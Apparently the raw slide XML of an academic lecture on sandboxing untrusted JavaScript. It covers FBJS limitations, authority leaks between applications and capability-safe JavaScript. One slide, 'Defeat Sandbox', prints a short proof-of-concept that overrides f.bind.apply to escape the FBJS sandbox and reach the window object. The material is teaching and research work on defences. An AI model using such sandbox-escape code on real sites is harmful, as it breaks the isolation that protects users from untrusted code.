          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>                 ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>                // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> o = {};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>                o = o + “ “;    // converts o to String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34821" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="5924550"/>
            <a:ext cx="6540124" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bottom line: need to restrict definitions that occur in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>trusted” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="adsafe"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="152400"/>
            <a:ext cx="1752600" cy="858976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Date Placeholder 8"/>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10" name="Slide Number Placeholder 9"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 10"/>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685800" y="2438400"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isolation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Between </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="960000"/>
              </a:solidFill>
            </a:endParaRPr>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42</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FBJS limitations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authority leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can write/read properties of native objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = {};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ObjProtToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Obj.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Communication between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Obj.toString.channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ”message”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>receive_message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Obj.toString.channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a: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Defeat Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5181600"/>
            <a:ext cx="8229600" cy="944563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Redefine bind method used to Curry functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Interferes with code that uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>f.bind.apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(e)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"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44</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1524000"/>
            <a:ext cx="6096000" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>="#" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>="break()"&gt;Attack FBJS!&lt;/a&gt; &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>function break(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> f = function(){};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>f.bind.apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>           (function(old){return function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>getWindow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = y[1].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>setReplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>getWindow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(0).alert("Hacked!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>                      return old(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>            })(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>f.bind.apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>}&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr 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isolate applications?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capability-based protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traditional idea in operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capability is “ticket” granting access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Process can only access through capabilities given</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If we had a capability-safe subset of JavaScript:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Give independent apps disjoint capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: Is there a capability-safe JavaScript?</a:t>
            </a:r>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45</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Work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Object-capability model  [Miller, …]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intriguing, not formally rigorous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples: E (Java), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>JoeE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Java), Emily (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ocaml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), W7 (Scheme)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authority safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safety conditions sufficient to prevent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authority leak  (“only connectivity begets connectivity”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Privilege escalation (“no authority amplification”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preserved by program execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Eliminates basis for our previous attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capability safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access control model sufficient to imply authority safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Theorems: Cap safety </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Auth safety </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accepted examples satisfy our formal definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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46</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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 5" descr="logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="1524000"/>
            <a:ext cx="207803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685800" y="2919413"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="960000"/>
              </a:solidFill>
            </a:endParaRPr>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47</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The web is an exciting area for real CS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect page by filtering, rewriting, wrapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inter-application: requires additional techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Challenge: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and capability-safe JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many more theory + practice problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Define precise model of web application platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyze protocols, conventions, attacks, defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are http-only cookies useful?;  Is CSRF prevented?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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48</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Additional related work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Yu,Chander,Islam,Serikov’07]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>JavaScript instrumentation for browser security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Rewriting of JavaScript to enforce security policies based on edit-automata.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
